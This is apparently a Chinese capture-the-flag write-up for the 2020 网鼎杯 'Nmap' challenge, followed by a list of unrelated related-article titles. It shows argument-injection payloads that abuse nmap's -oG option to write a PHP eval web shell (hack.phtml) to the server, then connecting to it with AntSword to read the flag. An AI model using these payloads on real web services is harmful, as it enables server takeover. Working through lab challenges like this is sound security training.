命令执行 [网鼎杯 2020 朱雀组]Nmap1

打开题目

输入127.0.0.1

可以得到回显结果,猜测是命令执行,尝试使用|分隔地址与命令

127.0.0.1 | ls

可以看到|被\转义,尝试使用;:

直接放入Payload:

' <?php @eval($_POST"hack");?> -oG hack.php '

尝试修改文件名后缀为phtml:

' <?php @eval($_POST"hack");?> -oG hack.phtml '

加上扫描的地址:127.0.0.1:

127.0.0.1 | ' <?= @eval($_POST"hack");?> -oG hack.phtml'

得到

查看扫描列表:

查看写入的文件,即访问hack.phtml

蚁剑连接

在根目录找到了flag

相关推荐
大圣编蚕4 小时前
初探 NDK 的世界:从零开始理解 Android 原生开发
android
云贝贝贝4 小时前
MySQL 慢查询定位与索引优化实战
android
骑着蜗牛撵大象3275 小时前
服务下线不再炸:分层关闭、TCP 存活探测与负载均衡排水的落地套路
android·tcp/ip·负载均衡·tcp·高可用·健康检查·优雅关闭
三少爷的鞋7 小时前
别再这么写协程了!Marcin Moskała 剖析的 几个常见协程误区与重构
android
mmsx8 小时前
Android 防二次打包第一道锁:签名校验与完整性校验
android·kotlin
mmsx8 小时前
Android 混淆不等于安全:二次打包链路完整走一遍
android·kotlin
小宋102110 小时前
Agent轨迹级评测实战:工具选择、预算超限与回归门禁
android·网络·人工智能·回归
墨天梦12 小时前
D05_ViewModel与单向数据流
android·kotlin
蒸鱼Yuzheng13 小时前
Android 构建可复现性:APK 指纹、文件级差异与供应链审计
android·apk·devops·软件供应链·可复现构建
墨天梦15 小时前
D03_Compose列表与稳定身份
android·gitee·kotlin